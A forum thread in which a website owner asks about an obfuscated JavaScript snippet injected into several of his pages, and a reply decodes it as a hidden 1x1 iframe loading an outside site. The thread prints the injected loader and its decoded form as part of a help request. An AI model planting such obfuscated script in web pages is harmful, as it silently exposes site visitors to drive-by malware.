SitePoint Sponsor

User Tag List

Results 1 to 2 of 2
  1. #1
    SitePoint Enthusiast HappyPike's Avatar
    Join Date
    Jan 2005
    Location
    USA
    Posts
    46
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Weird Codes/Exploit?

    Hi,

    I noticed the following from 5 pages on my site:

    <script language="JavaScript">e = '0x00' + '31';str1 = "&#37;8A%D2%D9%C4%AE%C3%C2%C9%DA%D5%8D%90%C4%D9%C3 %D9% D0%D9%DA%D9%C2%C9%88%D6%D9%D2%D2%D5%DC%90%8C%8A%D9 %D4%C0%D1%DD%D5%AE%C3%C0%D3%8D%90%D6%C2%C2%DE%88%9 F%9F%DF%C5%C2%D3%DC%C2%9C%D3%DF%DD%9F%D2%C6%9F%90% AE%C7%D9%D2%C2%D6%8D%81%AE%D6%D5%D9%D7%D6%C2%8D%81 %8C%8A%9F%D9%D4%C0%D1%DD%D5%8C%8A%9F%D2%D9%C4%8C"; str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
    Any idea what it does or if it's a known exploit? I am pretty sure I didn't add it and have removed them from the pages.
    The only way to have a friend is to be one. ~ Ralph Waldo Emerson

  2. #2
    SitePoint Addict jtrelfa's Avatar
    Join Date
    Oct 2004
    Location
    Troy, Mi
    Posts
    231
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Here's what it writes:
    HTML Code:
    <div style="visibility: hidden;"><iframe src="http://outcnt.com/dx/" height="1" width="1"></iframe></div>


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •